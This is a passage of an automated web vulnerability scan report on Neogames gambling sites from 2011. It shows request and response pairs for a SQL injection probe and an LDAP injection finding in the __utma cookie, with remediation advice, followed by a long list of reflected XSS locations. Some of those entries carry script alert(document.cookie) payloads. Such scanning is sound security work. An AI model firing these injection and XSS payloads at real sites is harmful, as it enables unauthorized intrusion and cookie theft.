Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

Request 2

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0

2. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/outbound/article/games.bet365.com

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0

Request 2

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)!(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

3. Cross-site scripting (reflected) previous next
There are 469 instances of this issue:

http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]
http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]
http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://bid.openx.net/json [c parameter]
http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]
http://scratch.co.uk/ [currency parameter]
http://scratch.co.uk/ [currency parameter]
https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]
https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]
https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]
https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]
http://trk.primescratchcards.com/ [ac parameter]
https://www.aspireaffiliates.com/ [CMI parameter]
https://www.aspireaffiliates.com/ [CMI parameter]
https://www.aspireaffiliates.com/ [CMI parameter]
https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]
https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]
http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]
http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]
http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]
http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]
http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]
http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]
http://www.primescratchcards.com/index.asp [curr parameter]
http://www.primescratchcards.com/index.asp [curr parameter]
http://ad.yieldmanager.com/imp [Referer HTTP header]
https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]
http://home.okscratchcards.com/AboutUs.aspx [BO cookie]
http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]
http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/FairPlay.aspx [BO cookie]
http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]
http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/Promotions.aspx [BO cookie]
http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/Responsible.aspx [BO cookie]
http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]
http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/Terms.aspx [BO cookie]
http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]
http://home.okscratchcards.com/help.aspx [BO cookie]
http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]
http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]
http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
http://primescratchcards.com/images/Responsible.asp [ARC cookie]
http://primescratchcards.com/images/Responsible.asp [ARC cookie]
http://primescratchcards.com/images/Responsible.asp [ARC cookie]
http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
http://primescratchcards.com/images/aboutus.asp [ARC cookie]
http://primescratchcards.com/images/aboutus.asp [ARC cookie]
http://primescratchcards.com/images/aboutus.asp [ARC cookie]
http://primescratchcards.com/images/affiliates.asp [ARC cookie]
http://primescratchcards.com/images/affiliates.asp [ARC cookie]
http://primescratchcards.com/images/affiliates.asp [ARC cookie]
http://primescratchcards.com/images/bg.jpg [ARC cookie]
http://primescratchcards.com/images/bg.jpg [ARC cookie]
http://primescratchcards.com/images/bg.jpg [ARC cookie]
http://primescratchcards.com/images/contactus.asp [ARC cookie]
http://primescratchcards.com/images/contactus.asp [ARC cookie]
http://primescratchcards.com/images/contactus.asp [ARC cookie]
http://primescratchcards.com/images/fairplay.asp [ARC cookie]
http://primescratchcards.com/images/fairplay.asp [ARC cookie]
http://primescratchcards.com/images/fairplay.asp [ARC cookie]
http://primescratchcards.com/images/help.asp [ARC cookie]
http://primescratchcards.com/images/help.asp [ARC cookie]
http://primescratchcards.com/images/help.asp [ARC cookie]
http://primescratchcards.com/images/index.asp [ARC cookie]
http://primescratchcards.com/images/index.asp [ARC cookie]
http://primescratchcards.com/images/index.asp [ARC cookie]
http://primescratchcards.com/images/media.asp [ARC cookie]
http://primescratchcards.com/images/media.asp [ARC cookie]
http://primescratchcards.com/images/media.asp [ARC cookie]
http://primescratchcards.com/images/playersclub.asp [ARC cookie]
http://primescratchcards.com/images/playersclub.asp [ARC cookie]
http://primescratchcards.com/images/playersclub.asp [ARC cookie]
http://primescratchcards.com/images/promotions.asp [ARC cookie]
http://primescratchcards.com/images/promotions.asp [ARC cookie]
http://primescratchcards.com/images/promotions.asp [ARC cookie]
http://primescratchcards.com/images/terms.asp [ARC cookie]
http://primescratchcards.com/images/terms.asp [ARC cookie]
http://primescratchcards.com/images/terms.asp [ARC cookie]
http://primescratchcards.com/images/underage.asp [ARC cookie]
http://primescratchcards.com/images/underage.asp [ARC cookie]
http://primescratchcards.com/images/underage.asp [ARC cookie]
http://scratch.co.uk/ [affiliate cookie]
http://scratch.co.uk/ [affiliate cookie]
http://scratch.co.uk/ [currency cookie]
http://scratch.co.uk/ [currency cookie]
http://scratch.co.uk/ [currency cookie]
http://scratch.co.uk/ [currency cookie]
http://scratch.co.uk/ [lang cookie]
http://scratch.co.uk/ [lang cookie]
http://scratch.co.uk/ [neogamesemail cookie]
http://scratch.co.uk/about/ [affiliate cookie]
http://scratch.co.uk/about/ [currency cookie]
http://scratch.co.uk/about/ [lang cookie]
http://scratch.co.uk/contact/ [affiliate cookie]
http://scratch.co.uk/contact/ [currency cookie]
http://scratch.co.uk/contact/ [lang cookie]
http://scratch.co.uk/help/ [affiliate cookie]
http://scratch.co.uk/help/ [currency cookie]
http://scratch.co.uk/help/ [lang cookie]
http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]
http://scratch.co.uk/help/deposit/methods/ [currency cookie]
http://scratch.co.uk/help/deposit/methods/ [lang cookie]
http://scratch.co.uk/help/fairplay/ [affiliate cookie]
http://scratch.co.uk/help/fairplay/ [currency cookie]
http://scratch.co.uk/help/fairplay/ [lang cookie]
http://scratch.co.uk/help/privacy/ [affiliate cookie]
http://scratch.co.uk/help/privacy/ [currency cookie]
http://scratch.co.uk/help/privacy/ [lang cookie]
http://scratch.co.uk/invite-friend/ [affiliate cookie]
http://scratch.co.uk/invite-friend/ [currency cookie]
http://scratch.co.uk/invite-friend/ [lang cookie]
http://scratch.co.uk/over-18/ [affiliate cookie]
http://scratch.co.uk/over-18/ [currency cookie]
http://scratch.co.uk/over-18/ [lang cookie]
http://scratch.co.uk/problem-gambling/ [affiliate cookie]
http://scratch.co.uk/problem-gambling/ [currency cookie]
http://scratch.co.uk/problem-gambling/ [lang cookie]
http://scratch.co.uk/promotions/ [affiliate cookie]
http://scratch.co.uk/promotions/ [currency cookie]
http://scratch.co.uk/promotions/ [lang cookie]
http://scratch.co.uk/promotions/argos/ [affiliate cookie]
http://scratch.co.uk/promotions/argos/ [currency cookie]
http://scratch.co.uk/promotions/argos/ [currency cookie]
http://scratch.co.uk/promotions/argos/ [lang cookie]
http://scratch.co.uk/terms/ [affiliate cookie]
http://scratch.co.uk/terms/ [currency cookie]
http://scratch.co.uk/terms/ [lang cookie]
http://scratch.co.uk/vis-club/ [affiliate cookie]
http://scratch.co.uk/vis-club/ [currency cookie]
http://scratch.co.uk/vis-club/ [lang cookie]
http://scratch.co.uk/winners/ [affiliate cookie]
http://scratch.co.uk/winners/ [currency cookie]
http://scratch.co.uk/winners/ [lang cookie]
http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]
http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]
http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]
http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]
http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]
http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]
http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]
http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]
http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Help.aspx [BO cookie]
http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Home.aspx [BO cookie]
http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]
http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]
http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]
http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]
http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]
http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]
http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]
http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]
http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]
http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]
http://www.hopa.com/ [BO cookie]
http://www.hopa.com/ [RegistrationMode cookie]
http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]
http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]
http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]
http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]
http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]
http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/Help.aspx [BO cookie]
http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]
http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]
http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]
http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]
http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]
http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/Terms.aspx [BO cookie]
http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]
http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]
http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]
http://www.karamba.com/ [BO cookie]
http://www.karamba.com/ [RegistrationMode cookie]
http://www.karamba.com/AboutUs.aspx [BO cookie]
http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]
http://www.karamba.com/FairPlay.aspx [BO cookie]
http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]
http://www.karamba.com/Help.aspx [BO cookie]
http://www.karamba.com/Help.aspx [RegistrationMode cookie]
http://www.karamba.com/Home.aspx [BO cookie]
http://www.karamba.com/Home.aspx [RegistrationMode cookie]
http://www.karamba.com/InviteFriend.aspx [BO cookie]
http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.karamba.com/PlayersClub.aspx [BO cookie]
http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.karamba.com/Privacy.aspx [BO cookie]
http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]
http://www.karamba.com/Promotions.aspx [BO cookie]
http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]
http://www.karamba.com/Responsible.aspx [BO cookie]
http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]
http://www.karamba.com/Sitemap.aspx [BO cookie]
http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]
http://www.karamba.com/Terms.aspx [BO cookie]
http://www.karamba.com/Terms.aspx [RegistrationMode cookie]
http://www.karamba.com/UnderAge.aspx [BO cookie]
http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]
http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]
http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]
http://www.mundirasca.com/ [BO cookie]
http://www.mundirasca.com/ [RegistrationMode cookie]
http://www.mundirasca.com/AboutUs.aspx [BO cookie]
http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]
http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]
http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]
http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]
http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]
http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]
http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]
http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]
http://www.mundirasca.com/FAQ.aspx [BO cookie]
http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]
http://www.mundirasca.com/FairPlay.aspx [BO cookie]
http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]
http://www.mundirasca.com/Help.aspx [BO cookie]
http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]
http://www.mundirasca.com/InviteFriend.aspx [BO cookie]
http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.mundirasca.com/PlayersClub.aspx [BO cookie]
http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.mundirasca.com/Promotions.aspx [BO cookie]
http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]
http://www.mundirasca.com/Responsible.aspx [BO cookie]
http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]
http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]
http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
http://www.mundirasca.com/Terms.aspx [BO cookie]
http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]
http://www.mundirasca.com/UnderAge.aspx [BO cookie]
http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]
http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]
http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]
https://www.neogamespartners.com/ [CMI parameter]
https://www.neogamespartners.com/ [CMI parameter]
https://www.neogamespartners.com/ [CMI parameter]
https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
http://www.primescratchcards.com/Responsible.asp [ARC cookie]
http://www.primescratchcards.com/Responsible.asp [ARC cookie]
http://www.primescratchcards.com/Responsible.asp [ARC cookie]
http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
http://www.primescratchcards.com/aboutus.asp [ARC cookie]
http://www.primescratchcards.com/aboutus.asp [ARC cookie]
http://www.primescratchcards.com/aboutus.asp [ARC cookie]
http://www.primescratchcards.com/affiliates.asp [ARC cookie]
http://www.primescratchcards.com/affiliates.asp [ARC cookie]
http://www.primescratchcards.com/affiliates.asp [ARC cookie]
http://www.primescratchcards.com/contactus.asp [ARC cookie]
http://www.primescratchcards.com/contactus.asp [ARC cookie]
http://www.primescratchcards.com/contactus.asp [ARC cookie]
http://www.primescratchcards.com/fairplay.asp [ARC cookie]
http://www.primescratchcards.com/fairplay.asp [ARC cookie]
http://www.primescratchcards.com/fairplay.asp [ARC cookie]
http://www.primescratchcards.com/help.asp [ARC cookie]
http://www.primescratchcards.com/help.asp [ARC cookie]
http://www.primescratchcards.com/help.asp [ARC cookie]
http://www.primescratchcards.com/index.asp [ARC cookie]
http://www.primescratchcards.com/index.asp [ARC cookie]
http://www.primescratchcards.com/index.asp [ARC cookie]
http://www.primescratchcards.com/media.asp [ARC cookie]
http://www.primescratchcards.com/media.asp [ARC cookie]
http://www.primescratchcards.com/media.asp [ARC cookie]
http://www.primescratchcards.com/playersclub.asp [ARC cookie]
http://www.primescratchcards.com/playersclub.asp [ARC cookie]
http://www.primescratchcards.com/playersclub.asp [ARC cookie]
http://www.primescratchcards.com/promotions.asp [ARC cookie]
http://www.primescratchcards.com/promotions.asp [ARC cookie]
http://www.primescratchcards.com/promotions.asp [ARC cookie]
http://www.primescratchcards.com/terms.asp [ARC cookie]
http://www.primescratchcards.com/terms.asp [ARC cookie]
http://www.primescratchcards.com/terms.asp [ARC cookie]
http://www.primescratchcards.com/underage.asp [ARC cookie]
http://www.primescratchcards.com/underage.asp [ARC cookie]
http://www.primescratchcards.com/underage.asp [ARC cookie]
http://www.scratch2cash.com/ [BO cookie]
http://www.scratch2cash.com/ [RegistrationMode cookie]
http://www.scratch2cash.com/AboutUs.aspx [BO cookie]
http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]
http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/FairPlay.aspx [BO cookie]
http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/Help.aspx [BO cookie]
http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/Home.aspx [BO cookie]
http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]
http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]
http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/Promotions.aspx [BO cookie]
http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/Responsible.aspx [BO cookie]
http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie]
http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
